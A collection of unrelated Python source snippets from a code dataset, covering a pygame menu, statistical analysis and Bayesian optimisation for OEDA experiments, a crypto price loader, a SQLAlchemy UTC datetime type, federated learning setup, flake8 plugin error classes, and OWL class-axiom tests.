            if self.hover and not previous:
                self.select_sound.play()
        super(MapSelection, self).get_event(event)

    @staticmethod
    def get_gameplay_state(button):
        # "quadra" -> "PlayingQuadra", etc.
        return 'Playing' + button['name'].title().replace(' ', '')

    @staticmethod
    def text_objects(text, font):
        """
        Render *text* in black and return (surface, rect) — the button label.
        """
        text_surface = font.render(text, True, pygame.Color("black"))
        return text_surface, text_surface.get_rect()
| StarcoderdataPython |
5138522 | <gh_stars>0
from .district import District
from .district_detail import DistrictDetail
| StarcoderdataPython |
# Read n, sum all of its divisors, then print the contest-specific
# formula 5*sigma(n) - 24 (printed on the following line of the script).
n=int(input())
ans=0
for i in range(1,n+1):
    if n%i==0: ans+=i
print(ans*5-24) | StarcoderdataPython |
5039148 | from oeda.databases import db
from oeda.log import *
from oeda.analysis.two_sample_tests import Ttest, TtestPower, TtestSampleSizeEstimation
from oeda.analysis.one_sample_tests import DAgostinoPearson, AndersonDarling, KolmogorovSmirnov, ShapiroWilk
from oeda.analysis.n_sample_tests import Bartlett, FlignerKilleen, KruskalWallis, Levene, OneWayAnova
from oeda.analysis.factorial_tests import FactorialAnova
from oeda.rtxlib.executionstrategy.SelfOptimizerStrategy import start_self_optimizer_strategy
from oeda.rtxlib.executionstrategy.MlrStrategy import start_mlr_mbo_strategy
from collections import OrderedDict
from oeda.utilities.Structures import DefaultOrderedDict
from copy import deepcopy
import traceback
outer_key = "payload" # this is by default, see: data_point_type properties in experiment_db_config.json
def run_analysis(wf):
    """Dispatch the workflow to the analysis routine matching wf.analysis["type"].

    Unknown types are silently ignored, matching the original if/elif chain.
    """
    dispatch = {
        "two_sample_tests": start_two_sample_tests,
        "factorial_tests": start_factorial_tests,
        "one_sample_tests": start_one_sample_tests,
        "n_sample_tests": start_n_sample_tests,
    }
    handler = dispatch.get(wf.analysis["type"])
    if handler is not None:
        handler(wf)
    info("> Finished analysis")
# there are always 2 samples for the t-test
def start_two_sample_tests(wf):
    """Run a two-sample t-test over the workflow's stages and persist the result.

    Reads the per-stage samples for wf.analysis["data_type"] from the
    experiment database, runs the t-test at significance
    wf.analysis["tTestAlpha"], and saves the outcome together with the
    per-stage knob configurations (stage number -> knob tuple).
    """
    experiment_id = wf.id
    alpha = wf.analysis["tTestAlpha"]
    key = wf.analysis["data_type"]
    mean_diff = 0.1 # as in crowdnav-elastic-ttest-sample-size/definition.py # TODO: get it from user ??
    # this part will test this way of t-test: Default --> Best configuration
    stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=wf.step_no, key=key)
    test1 = Ttest(stage_ids=stage_ids, y_key=key, alpha=alpha)
    result = test1.run(data=samples, knobs=knobs)
    # prepare default & optimal knobs to save to analysis
    stage_no = 1
    knobs = {}
    for tpl in wf.execution_strategy["knobs"]:
        knobs[stage_no] = tpl
        stage_no += 1
    db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test1.name, result=result, knobs=knobs)
    # if we want to integrate following tests, they should be saved as another step_no, just increment it before saving
    # x1 = samples[0]
    # x2 = samples[1]
    # pooled_std = sqrt((np.var(x1) + np.var(x2)) / 2)
    # effect_size = mean_diff / pooled_std
    # effect_size = wf.analysis["tTestEffectSize"]
    # test2 = TtestPower(stage_ids=stage_ids, y_key=key, effect_size=effect_size)
    # result2 = test2.run(data=samples, knobs=knobs)
    # db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test2.name, result=result2)
    #
    # test3 = TtestSampleSizeEstimation(stage_ids=stage_ids, y_key=key, effect_size=None, mean_diff=mean_diff)
    # result3 = test3.run(data=samples, knobs=knobs)
    # db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test3.name, result=result3)
    return result
##########################
## One sample tests (Normality tests)
##########################
def start_one_sample_tests(wf):
    """Run every supported normality test on the workflow's single sample.

    Each test (Anderson-Darling, D'Agostino-Pearson, Kolmogorov-Smirnov,
    Shapiro-Wilk) is executed on the first (and only) sample for
    wf.analysis["data_type"] at significance wf.analysis["alpha"], and each
    result is persisted individually.
    """
    experiment_id = wf.id  # renamed from `id`, which shadowed the builtin
    alpha = wf.analysis["alpha"]
    key = wf.analysis["data_type"]
    stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=wf.step_no, key=key)
    # All four tests share the identical construct/run/save sequence, so run
    # them in a loop instead of repeating the boilerplate per test.
    for test_cls in (AndersonDarling, DAgostinoPearson, KolmogorovSmirnov, ShapiroWilk):
        test = test_cls(experiment_id, key, alpha=alpha)
        # one-sample tests operate on a single sample, hence samples[0]
        result = test.run(data=samples[0], knobs=knobs)
        db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test.name, result=result)
    return
#########################
# Different distributions tests
# pass necessary stage_ids to db().save_analysis() method
#########################
def start_n_sample_tests(wf):
    """Run every supported n-sample test across the workflow's stages.

    Each test (one-way ANOVA, Kruskal-Wallis, Levene, Bartlett,
    Fligner-Killeen) is run on the per-stage samples for
    wf.analysis["data_type"] at significance wf.analysis["alpha"], and each
    result is persisted individually.
    """
    experiment_id = wf.id  # renamed from `id`, which shadowed the builtin
    alpha = wf.analysis["alpha"]
    key = wf.analysis["data_type"]
    stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=wf.step_no, key=key)
    # All five tests share the identical construct/run/save sequence.
    for test_cls in (OneWayAnova, KruskalWallis, Levene, Bartlett, FlignerKilleen):
        test = test_cls(stage_ids=stage_ids, y_key=key, alpha=alpha)
        result = test.run(data=samples, knobs=knobs)
        db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test.name, result=result)
    return
# there are >= 2 samples for factorial_tests
# ES saves the ordered dict in unordered format because of JSON serialization / deserialization
# see https://github.com/elastic/elasticsearch-py/issues/68 if you want to preserve order in ES
def start_factorial_tests(wf):
    """Run a factorial ANOVA over all stages of *wf* and persist the merged tables.

    Returns True on success, False when the data type is missing or the
    ANOVA computation raises.
    """
    experiment_id = wf.id
    key = wf.analysis["data_type"]
    # key = "overhead"
    if key is not None:
        try:
            stage_ids, samples, knobs = get_tuples(experiment_id=experiment_id, step_no=wf.step_no, key=key)
            test = FactorialAnova(stage_ids=stage_ids, y_key=key, knob_keys=None, stages_count=len(stage_ids))
            aov_table, aov_table_sqr = test.run(data=samples, knobs=knobs)
            # before saving and merging tables, extract useful information
            # (strip patsy's C(...) notation from both tables' row labels)
            aov_table = delete_combination_notation(aov_table)
            aov_table_sqr = delete_combination_notation(aov_table_sqr)
            # type(dd) is DefaultOrderedDict
            # keys = [exploration_percentage, route_random_sigma, exploration_percentage,route_random_sigma...]
            # resultDict e.g. {'PR(>F)': 0.0949496951695454, 'F': 2.8232330924997346 ...
            dod = iterate_anova_tables(aov_table=aov_table, aov_table_sqr=aov_table_sqr)
            # from now on, caller functions should fetch result from DB
            db().save_analysis(experiment_id=experiment_id, step_no=wf.step_no, analysis_name=test.name, anova_result=dod, knobs=knobs)
            return True
        except Exception as e:
            print("error in factorial tests, while performing anova")
            tb = traceback.format_exc()
            error(tb)
            return False
    else:
        error("data type for anova is not properly provided")
        return False
def get_tuples(experiment_id, step_no, key):
    """Fetch stage ids plus per-stage samples and knobs for one experiment step."""
    stage_ids = db().get_stages(experiment_id, step_no)[0]
    data, knob_map = db().get_data_for_analysis(experiment_id, step_no)
    # replace each stage's raw data points with the plain values stored under *key*
    extract_inner_values(key=key, stage_ids=stage_ids, data=data)
    samples, knobs = [], []
    for stage_id in stage_ids:
        samples.append(data[stage_id])
        knobs.append(knob_map[stage_id])
    return stage_ids, samples, knobs
def extract_inner_values(key, stage_ids, data):
    """In place, reduce each stage's data points to the bare values stored under *key*.

    *data* maps stage_id -> list of data points; each point nests its payload
    under the module-level *outer_key*.  Points lacking *key* are dropped.
    """
    for stage_id in stage_ids:
        data[stage_id] = [
            point[outer_key][key]
            for point in data[stage_id]
            if key in point[outer_key]
        ]
# type(table) is DataFrame
# rows are keys of the result obj param1; param2; param1, param2 etc.
# values are inner keys of those keys, type of values is dict
# set NaN or nan values to None to save to DB properly
# they are like (nan, <type 'float'>), so we compare them by str
def iterate_anova_tables(aov_table, aov_table_sqr):
    """Flatten two ANOVA result DataFrames into one ordered dict of dicts.

    Rows are interaction keys (param1; param2; "param1, param2"; ...); the
    columns of both tables are merged per row.  NaN values are normalized to
    None so the result can be stored in the database.

    Note: pandas translates the "PR(>F)" column to the positional attribute
    "_4" in itertuples(), hence the special case below.
    """
    def _clean(value):
        # NaN cannot be stored meaningfully; values are like
        # (nan, <type 'float'>), so compare by str and map to None.
        return None if str(value) in ('nan', 'NaN') else value

    dd = DefaultOrderedDict(OrderedDict)
    # iterate first table
    for row in aov_table.itertuples():
        for col_name in list(aov_table):
            if col_name == "PR(>F)" and hasattr(row, "_4"):  # PR(>F) is translated to _4 by pandas
                dd[row.Index][col_name] = _clean(getattr(row, "_4"))
            elif hasattr(row, col_name):
                dd[row.Index][col_name] = _clean(getattr(row, col_name))
    # iterate second table
    for row in aov_table_sqr.itertuples():
        for col_name in list(aov_table_sqr):
            if hasattr(row, col_name):
                dd[row.Index][col_name] = _clean(getattr(row, col_name))
    return dd
# https://stackoverflow.com/questions/4406501/change-the-name-of-a-key-in-dictionary
# https://stackoverflow.com/questions/40855900/pandas-rename-index-values
def delete_combination_notation(table):
    """Strip patsy's C(...) categorical notation from a DataFrame's index labels.

    An index label like "C(param1):C(param2)" becomes "param1, param2".
    Returns a new DataFrame; *table* itself is not modified.
    """
    # Build one rename mapping and apply it in a single rename() call; the
    # old implementation called rename() once per row, copying the whole
    # frame each time (O(rows^2)), and joined the parts with a manual loop.
    renames = {}
    for label in table.index:
        factors = [str(part).replace('C(', '').replace(')', '')
                   for part in str(label).split(':')]
        renames[label] = ', '.join(factors)
    return table.rename(index=renames)
# https://stackoverflow.com/questions/16412563/python-sorting-dictionary-of-dictionaries
def get_significant_interactions(anova_result, alpha, nrOfParameters):
    """Select up to *nrOfParameters* interactions whose p-value is below *alpha*.

    Returns an ordered dict mapping interaction key -> result dict (sorted by
    ascending p-value, each marked with is_selected=True), or None when no
    interaction is significant.
    """
    # now we want to select the most important factors out of result
    significant_interactions = []
    for interaction_key in anova_result.keys():
        res = anova_result[interaction_key]
        # Residual will be filtered here because of None check
        if 'PR(>F)' in res:
            pvalue = res['PR(>F)']
            # BUG FIX: the None check must come first; the old order
            # (`pvalue < alpha and pvalue is not None`) evaluated
            # `None < alpha`, which raises TypeError on Python 3.
            if pvalue is not None and pvalue < alpha:
                significant_interactions.append((interaction_key, res, pvalue))
    # sort w.r.t pvalue and also pass other values to caller fcn
    sorted_significant_interactions = sorted((pvalue, interaction_key, res) for (interaction_key, res, pvalue) in significant_interactions)
    if sorted_significant_interactions:
        dd = DefaultOrderedDict(OrderedDict)
        # Filtering phase: keep only the nrOfParameters most significant
        for idx, (pvalue, interaction_key, res) in enumerate(sorted_significant_interactions):
            if idx < nrOfParameters:
                # TODO: mark the selected ones in DB, for UI to use this properly, update_analysis method should be changed
                # for now, we'll re-iterate tuples and mark them in UI
                res["is_selected"] = True
                dd[interaction_key] = res
        return dd
    return None
''' distributes number of iterations within optimization to respective significant interactions
e.g. nrOfFoundInteractions = 10, and we have 3 influencing factors; then
4 will be assigned to first (most) influencing factor, 3 will be assigned to second & third factor
as we use DefaultOrderedDict, we preserve the insertion order of tuples and we get keys based on index of values
'''
def assign_iterations(experiment, significant_interactions, execution_strategy_type):
    """Distribute the experiment's optimizer iterations across significant interactions.

    e.g. with optimizer_iterations = 10 and 3 influencing factors the split is
    [4, 3, 3] -- earlier (more influential) factors absorb the remainder.
    Each interaction also receives optimizer_iterations_in_design, and any
    share below gp_minimize's minimum (4 * number of parameters in the
    interaction) is raised to that minimum.  Mutates and returns
    *significant_interactions*.
    """
    nrOfFoundInteractions = len(significant_interactions.keys())
    optimizer_iterations = experiment["executionStrategy"]["optimizer_iterations"]
    # https://stackoverflow.com/questions/10366327/dividing-a-integer-equally-in-x-parts
    # BUG FIX: use floor division; plain `/` yields floats on Python 3 even
    # though the intent (per the old comment) was integer division.
    values = [optimizer_iterations // nrOfFoundInteractions for _ in range(nrOfFoundInteractions)]
    # divide up the remainder
    for i in range(optimizer_iterations % nrOfFoundInteractions):
        values[i] += 1
    # here, values = [4, 3, 3] for nrOfFoundInteractions = 3, optimizer_iterations = 10
    # keys = ['route_random_sigma', 'exploration_percentage', 'route_random_sigma, exploration_percentage']
    info("> values " + str(values))
    # BUG FIX: dict views are not subscriptable on Python 3
    # (`significant_interactions.keys()[i]` raised TypeError); materialize once.
    interaction_keys = list(significant_interactions.keys())
    for i in range(len(values)):
        key = interaction_keys[i]
        nr_params = len(str(key).split(', '))
        # TODO: set UI so that smaller value cannot be retrieved,
        # if you have more values in keys, then you need to set opt_iter_in_design accordingly
        # the restriction of n_calls <= 4 * nrOfParams is coming from gp_minimize
        # TODO: depending on execution_strategy_type, different values can be assigned
        if values[i] < nr_params * 4:
            values[i] = nr_params * 4
        significant_interactions[key]["optimizer_iterations"] = values[i]
        significant_interactions[key]["optimizer_iterations_in_design"] = nr_params * 4
    info("> Significant Interactions " + str(significant_interactions))
    return significant_interactions
def start_bogp(wf, sorted_significant_interactions):
    """Run one Bayesian-optimization pass per significant interaction; return the overall best.

    For every significant interaction, the experiment's execution strategy is
    rewritten to optimize only that interaction's parameters (bounded by the
    min/max of the user-provided values), the configured optimizer backend
    (self_optimizer or mlr_mbo) is run, and the per-run optimum is persisted
    as a "best" stage.  Returns (optimal_knob, optimal_result) of the best
    run across all interactions.
    """
    execution_strategy_type = wf.execution_strategy["type"]
    assigned_iterations = assign_iterations(wf._oeda_experiment, sorted_significant_interactions, execution_strategy_type)
    newExecutionStrategy = deepcopy(wf._oeda_experiment["executionStrategy"])
    # print(newExecutionStrategy)
    knobs = newExecutionStrategy["knobs"]
    # k, v example: "route_random_sigma, exploration_percentage": {"optimizer_iterations": 3,"PR(>F)": 0.13678788369818956, "optimizer_iterations_in_design": 8 ...}
    # after changing knobs parameter of experiment.executionStrategy, perform experimentation for each interaction (v)
    optimal_tuples = []
    optimizer_run = 1 # to create step_name to be passed to oedaCallback
    for k, v in sorted_significant_interactions.items():
        print("k: ", k, " v: ", v)
        # here chVars are {u'route_random_sigma': [0, 0.4], u'exploration_percentage': [0, 0.4, 0.6]}
        # print(experiment["changeableVariables"])
        # if there is only one x value in key, then fetch min & max values from chVars after sorting them because user can provide unsorted values in UI
        new_knob = {}
        params = str(k).split(', ')
        # convert values to float because their original type is unicode and skicit gives error about it
        if len(params) == 1:
            knobs[k] = sorted(knobs[k])
            min_value = knobs[k][0]
            max_value = knobs[k][-1]
            new_knob[str(k)] = [float(min_value), float(max_value)]
        else:
            for parameter in params:
                all_values = knobs[parameter] # user can provide different values [0, 0.2, 0.4], [0, 0.4, 0.2] etc.
                all_values = sorted(all_values)
                new_knob[parameter] = [float(all_values[0]), float(all_values[-1])]
        # prepare everything needed for experimentation
        # fetch optimizer_iterations and optimizer_iterations_in_design from assigned_iterations
        newExecutionStrategy["knobs"] = new_knob
        newExecutionStrategy["optimizer_iterations"] = assigned_iterations[k]["optimizer_iterations"]
        newExecutionStrategy["optimizer_iterations_in_design"] = assigned_iterations[k]["optimizer_iterations_in_design"]
        # set new values in wf
        wf.execution_strategy = newExecutionStrategy
        wf.step_name = "Bayesian Optimization - Run: " + str(optimizer_run)
        # perform desired optimization process
        # after each experimentation, we will get best value & knob related with that value
        # to find optimum out of all experiments, we use optimal_tuples array to keep track & sort at the end
        # also save this optimum as stage_result and distinguish between regular stage & overall stage (final) result
        stage_no = "best"
        if wf.execution_strategy["type"] == 'self_optimizer':
            optimal_knob, optimal_result = start_self_optimizer_strategy(wf)
            optimal_tuples.append((optimal_knob, optimal_result))
            info("> Saving optimal knob at the end of Bayesian process (scikit): " + str(optimal_knob) + ", " + str(optimal_result))
            db().save_stage(experiment_id=wf.id, step_no=wf.step_no, step_name=wf.step_name, stage_no=stage_no, knobs=optimal_knob, stage_result=optimal_result)
        elif wf.execution_strategy["type"] == 'mlr_mbo':
            optimal_knob, optimal_result = start_mlr_mbo_strategy(wf)
            optimal_tuples.append((optimal_knob, optimal_result))
            db().save_stage(experiment_id=wf.id, step_no=wf.step_no, step_name=wf.step_name, stage_no=stage_no, knobs=optimal_knob, stage_result=optimal_result)
            info("> Saving optimal knob at the end of Bayesian process (mlr-mbo): " + str(optimal_knob) + ", " + str(optimal_result))
        optimizer_run += 1
        # increment step_no by one as we treat each run of optimization as one step
        wf.step_no += 1
        # also reset stage_counter
        wf.stage_counter = 1
        wf.resetExperimentCounter(wf)
        # also update experiment's numberOfSteps
        db().update_experiment(experiment_id=wf.id, field='numberOfSteps', value=wf.step_no)
    intermediate_tuples = sorted(optimal_tuples, key=lambda x: x[1])
    info("> Intermediate_tuples & values " + str(intermediate_tuples))
    intermediate_knobs = intermediate_tuples[0][0]
    info("> intermediate_knobs " + str(intermediate_knobs))
    # find best configuration for intermediate runs and apply it on target system (if applicable)
    if wf.change_provider["changesApplicable"]:
        info("> applying changes using intermediate_knobs " + str(intermediate_knobs))
        wf.change_provider["instance"].applyChange(intermediate_knobs)
    info("> All knobs & values " + str(optimal_tuples))
    # find the best tuple (knob & result) for overall execution
    sorted_tuples = sorted(optimal_tuples, key=lambda x: x[1])
    info("> Sorted knobs & values " + str(sorted_tuples))
    # e.g. ({'route_random_sigma': 0.3, 'exploration_percentage': 0.5}), 0.4444444
    info("> sorted_tuples[0][0] " + str(sorted_tuples[0][0]) + " " + str(sorted_tuples[0][1]))
    return sorted_tuples[0][0], sorted_tuples[0][1]
| StarcoderdataPython |
4834118 | import json
import numpy as np
from datetime import datetime
import pandas as pd
from matplotlib import pyplot as plt
from pandas.plotting import register_matplotlib_converters
from .abstract_data_loading_strategy import dataLoadingStrat
class fileLoadingRaw(dataLoadingStrat):
    """
    concrete data loading strategy used for dataLoader class.
    Designed to load raw data stored from CryptoCompare api that has been
    stored in json format
    Initialisation / construction:
        - infile:           desired json file to load. json file has
                            been saved using the related webLoading
                            class, that is file is of format:
                            { "asset": [
                                  {
                                    "time": 1552147200,
                                    "close": 3937.14,
                                    "high": 3975.25,
                                    "low": 3933.41,
                                    "open": 3956.05,
                                    "volumefrom": 2041.4,
                                    "volumeto": 8097477.69
                                  },
                                  ...
                               ],
                               ...
                            }
        - symbols:          list of symbols corresponding to data in
                            infile.
        - ticksize:         interval of datapoints in infile.
                            "minute", "hour" or "day".
        - outfile:          optional outfile to save df.
    """
    def __init__(self, infile, symbols, ticksize, outfile=False):
        if infile.endswith('.json'):
            self._infile = infile
        else:
            raise ValueError("Infile must be json format")
        if all(isinstance(symbol, str) for symbol in symbols):
            self._symbols = symbols
        else:
            raise ValueError("Symbols must be list of string types")
        # map the user-facing ticksize name onto a pandas frequency string
        if ticksize == "hour":
            self._freq = '1H'
        elif ticksize == "day":
            self._freq = '1D'
        elif ticksize == 'minute':
            self._freq = '1T'
        else:
            raise ValueError("Incompatible ticksize")
        self._ticksize = ticksize
        if outfile and not outfile.endswith('.csv'):
            raise ValueError("outfile must be csv type")
        self._outfile = outfile
    def get_data(self):
        """
        Loads close prices of all assets in self._symbols for ticksize
        self._freq from raw data in self._infile by computing several
        steps:
        1. First checks all data and gets the earliest and latest
        timestamps.
        2. Creates a pandas dataframe indexed by datetimes from earliest
        to latest timestamp in steps of self._ticksize.
        3. Pulls associated close prices from the raw json file and
        stores them in the dataframe.
        Outputs:
            - df:           (pandas DataFrame) holds close prices of all
                            assets in self._symbols along with
                            associated datetimes as index
        Notes:
            - If there is no close price for a given date, the price of
            the previous date is carried forward (0.0 before the first
            known price).
        """
        with open(self._infile) as json_file:
            raw_data = json.load(json_file)
        now = datetime.now()
        earliest_timestamp = (now - datetime(1970, 1, 1)).total_seconds()
        latest_timestamp = 0
        # determine the longest series in file to build dataframe
        for symbol in self._symbols:
            for item in raw_data[symbol]:
                ts = item['time']
                earliest_timestamp = min(earliest_timestamp, ts)
                latest_timestamp = max(latest_timestamp, ts)
        # set up dataframe
        start_date = datetime.fromtimestamp(earliest_timestamp)
        end_date = datetime.fromtimestamp(latest_timestamp)
        times = pd.date_range(start=start_date, end=end_date, freq=self._freq)
        df = pd.DataFrame({'date': times})
        df = df.set_index('date')
        for symbol in self._symbols:
            print(symbol)
            asset_data = raw_data[symbol]
            close_times = ([datetime.fromtimestamp(item['time'])
                            for item in asset_data])
            if self._ticksize == "day":
                close_times = [time.date() for time in close_times]
            # Build an O(1) lookup table instead of calling list.index per
            # row, which made the fill O(n^2).  setdefault keeps the FIRST
            # occurrence of a timestamp, matching list.index semantics.
            price_by_time = {}
            for close_time, item in zip(close_times, asset_data):
                price_by_time.setdefault(close_time, item["close"])
            prices = []
            last_price = 0.0  # rows before the first known price stay 0.0
            for date in df.index:
                lookup = date.date() if self._ticksize == "day" else date
                if lookup in price_by_time:
                    last_price = price_by_time[lookup]
                # otherwise carry the previous date's price forward
                prices.append(last_price)
            # Assign the whole column at once; the old per-cell chained
            # assignment (df[symbol][i] = ...) used pandas chained indexing,
            # which may silently write to a temporary copy.
            df[symbol] = prices
        if self._outfile:
            df.to_csv(self._outfile)
        return df
class fileLoadingDF(dataLoadingStrat):
    """
    Concrete data loading strategy for the data loading class.
    Loads data previously saved as a pandas DataFrame in csv format.
    Initialisation:
        - infile:       (str) file name of csv file containing data
    """
    def __init__(self, infile):
        if not infile.endswith('.csv'):
            raise ValueError("infile must be csv format")
        self._infile = infile
    def get_data(self):
        df = pd.read_csv(self._infile)
        # Drop the unnamed index column written by DataFrame.to_csv, if present
        if 'Unnamed: 0' in df.keys():
            df = df.drop(columns=['Unnamed: 0'])
        return df
8039005 | from datetime import datetime, timezone
import sqlalchemy.types
class DateTime(sqlalchemy.types.TypeDecorator):
    """
    Custom DateTime, to make sure we always have aware datetime instances
    at the python side, and always store timestamps in the database in UTC.
    This is necessary, as MariaDB, contrary to PostgreSQL, does not support
    storing the timestamp *including* the timezone, in the database.
    """
    impl = sqlalchemy.types.DateTime
    # This type produces the same bound value for equal inputs, so it is safe
    # to use in SQLAlchemy's statement cache; without this declaration,
    # SQLAlchemy 1.4+ warns and disables caching for statements using it.
    cache_ok = True
    def process_bind_param(self, value: datetime, dialect) -> datetime:
        """Convert an aware datetime to naive UTC before sending it to the database."""
        if value is not None:
            if not value.tzinfo:
                raise TypeError("tzinfo is required")
            # store as naive UTC, since MariaDB cannot keep the timezone
            value = value.astimezone(timezone.utc).replace(tzinfo=None)
        return value
    def process_result_value(self, value: datetime, dialect) -> datetime:
        """Re-attach UTC tzinfo to the naive datetime coming back from the database."""
        if value is not None:
            assert not value.tzinfo
            value = value.replace(tzinfo=timezone.utc)
        return value
11383883 | <reponame>allaparthi/monorail
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import sys
# pylint: disable=line-too-long
# Read JSON from stdin (presumably `git cl`'s --json output -- the error text
# references `git cl upload`; verify against run_remotely.sh) and print the
# Gerrit CL URL, or exit non-zero with guidance when no CL is associated.
# NOTE(review): this uses Python 2 print-statement syntax; it must be run
# with a Python 2 interpreter.
d = json.load(sys.stdin)
if not d['issue_url']:
    print >> sys.stderr, "Failed to get Gerrit CL associated with this repo."
    print >> sys.stderr, "Ensure that you've run `git cl upload` before using run_remotely.sh"
    sys.exit(1)
print d['issue_url']
| StarcoderdataPython |
8016600 | <reponame>APPFL/APPFL
import os
import time
import json
import torch
from appfl.config import *
from appfl.misc.data import *
from models.cnn import *
import appfl.run_serial as rs
import appfl.run_mpi as rm
from mpi4py import MPI
DataSet_name = "Coronahack"
num_clients = 4
num_channel = 3 # 1 if gray, 3 if color
num_classes = 7 # number of the image classes
num_pixel = 32 # image size = (num_pixel, num_pixel)
dir = os.getcwd() + "/datasets/PreprocessedData/%s_Clients_%s" % (
DataSet_name,
num_clients,
)
def get_data(comm: MPI.Comm):
    """Load the server's test set and one training dataset per client from preprocessed json files."""
    def load_dataset(path):
        # each json file stores inputs under "x" and labels under "y"
        with open(path) as f:
            raw = json.load(f)
        return Dataset(torch.FloatTensor(raw["x"]), torch.tensor(raw["y"]))

    # test data for a server
    test_dataset = load_dataset("%s/all_test_data.json" % (dir))
    # training data for multiple clients
    train_datasets = [
        load_dataset("%s/all_train_data_client_%s.json" % (dir, client))
        for client in range(num_clients)
    ]
    data_sanity_check(train_datasets, test_dataset, num_channel, num_pixel)
    return train_datasets, test_dataset
def get_model(comm: MPI.Comm):
    """Build the user-defined CNN classifier for this experiment's image dimensions."""
    return CNN(num_channel, num_classes, num_pixel)
def main():
    """Entry point: run federated learning over MPI (server on rank 0, clients on the rest) or serially."""
    comm = MPI.COMM_WORLD
    comm_rank = comm.Get_rank()
    comm_size = comm.Get_size()
    ## Reproducibility
    torch.manual_seed(1)
    torch.backends.cudnn.deterministic = True
    start_time = time.time()
    train_datasets, test_dataset = get_data(comm)
    model = get_model(comm)
    print(
        "----------Loaded Datasets and Model----------Elapsed Time=",
        time.time() - start_time,
    )
    # read default configuration
    cfg = OmegaConf.structured(Config)
    if comm_size > 1:
        # MPI run: rank 0 hosts the aggregation server, all other ranks are clients
        if comm_rank == 0:
            rm.run_server(cfg, comm, model, num_clients, test_dataset, DataSet_name)
        else:
            rm.run_client(cfg, comm, model, num_clients, train_datasets)
        print("------DONE------", comm_rank)
    else:
        # single process: run server and clients serially
        rs.run_serial(cfg, model, train_datasets, test_dataset, DataSet_name)
# To run CUDA-aware MPI:
# mpiexec -np 5 --mca opal_cuda_support 1 python ./coronahack.py
# To run MPI:
# mpiexec -np 5 python ./coronahack.py
# To run:
# python ./coronahack.py
| StarcoderdataPython |
1786880 | <gh_stars>10-100
import typing
class Flake8Error(typing.NamedTuple):
    """A single error in the tuple format flake8 expects checkers to yield."""
    line_number: int
    offset: int
    text: str
    checker_cls: type


class AAAError(typing.NamedTuple):
    """A single error as produced internally, before conversion to Flake8Error."""
    line_number: int
    offset: int
    text: str
class Flake8AAAException(Exception):
    """Base class for all exceptions raised by this package."""
    pass
class TokensNotLoaded(Flake8AAAException):
    """
    `Checker.all_funcs()` was called before `ast_tokens` was populated. Usually
    this is done by `Checker.load()`.
    """
class EmptyBlock(Flake8AAAException):
    """
    Block has no nodes.
    """
class ValidationError(Flake8AAAException):
    """
    A rule violation found at a specific position in the checked file.
    Attributes:
        line_number (int)
        offset (int)
        text (str)
    """
    def __init__(self, line_number, offset, text):
        self.line_number = line_number
        self.offset = offset
        self.text = text
    def to_flake8(self, checker_cls: type) -> Flake8Error:
        """
        Convert this error to the tuple format flake8 consumes.
        Args:
            checker_cls: Class performing the check to be passed back to
                flake8.
        """
        return Flake8Error(
            line_number=self.line_number,
            offset=self.offset,
            text=self.text,
            checker_cls=checker_cls,
        )
    def to_aaa(self) -> AAAError:
        """Convert this error to an AAAError (same position and text, no checker class)."""
        return AAAError(
            line_number=self.line_number,
            offset=self.offset,
            text=self.text,
        )
| StarcoderdataPython |
116939 | import unittest
from rdflib import RDFS, Namespace
from funowl.annotations import Annotation
from funowl.class_axioms import SubClassOf, EquivalentClasses, DisjointClasses, DisjointUnion, HasKey
from funowl.class_expressions import ObjectIntersectionOf, ObjectSomeValuesFrom, ObjectUnionOf
from funowl.dataproperty_expressions import DataPropertyExpression
from funowl.objectproperty_expressions import ObjectPropertyExpression
from funowl.writers.FunctionalWriter import FunctionalWriter
from tests.utils.base import TestBase
SCT = Namespace("http://snomed.info/id/")
class ClassAxiomsTestCase(TestBase):
    """Tests of the functional-syntax rendering of OWL class axioms (SNOMED CT examples)."""
    def setUp(self) -> None:
        # fresh writer per test, with the default namespace bound to SNOMED CT
        self.sw = FunctionalWriter()
        self.sw.bind(None, SCT)
    def test_equivalentclasses(self):
        self.assertEqual("""EquivalentClasses(
    :303394007
    :45189000
    :609096000
)""", str(EquivalentClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
        with self.assertRaises(ValueError, msg="at least 2 arguments are required"):
            str(EquivalentClasses( SCT['303394007']).to_functional(self.sw))
        # Taken from SNOMED CT
        self.assertEqual("""EquivalentClasses(
    :303394007
    ObjectIntersectionOf(
        :45189000
        ObjectSomeValuesFrom( :609096000 ObjectIntersectionOf(
            ObjectSomeValuesFrom( :260686004 :129397003 )
            ObjectSomeValuesFrom( :363700003 :52988006 )
            ObjectSomeValuesFrom( :405813007 :69695003 )
        ) )
    )
)""", str(EquivalentClasses(
            SCT['303394007'],
            ObjectIntersectionOf(
                SCT['45189000'],
                ObjectSomeValuesFrom(
                    SCT['609096000'],
                    ObjectIntersectionOf(
                        ObjectSomeValuesFrom(SCT['260686004'], SCT['129397003']),
                        ObjectSomeValuesFrom(SCT['363700003'], SCT['52988006']),
                        ObjectSomeValuesFrom(SCT['405813007'], SCT['69695003']))))).to_functional(self.sw.reset())))
    def test_oio(self):
        """ Bug: ObjectIntersectionOf ends up being a single argument to ObjectSomeValuesOf """
        self.assertEqual("""ObjectIntersectionOf(
    :45189000
    ObjectSomeValuesFrom( :609096000 ObjectUnionOf(
        :1
        :2
    ) )
)""", str(ObjectIntersectionOf(
            SCT['45189000'],
            ObjectSomeValuesFrom(
                SCT['609096000'],
                ObjectUnionOf(
                    SCT['1'],
                    SCT['2']))).to_functional(self.sw.reset())))
    def test_disjointclasses(self):
        self.assertEqual("""DisjointClasses(
    :303394007
    :45189000
    :609096000
)""", str(DisjointClasses(SCT['303394007'], SCT['45189000'], SCT['609096000']).to_functional(self.sw)))
    def test_disjointunion(self):
        self.assertEqual("""DisjointUnion( :12345
    :303394007
    :45189000
    :609096000
 )""", str(DisjointUnion(SCT['12345'], SCT['303394007'], SCT['45189000'], SCT['609096000']).
              to_functional(self.sw.reset())))
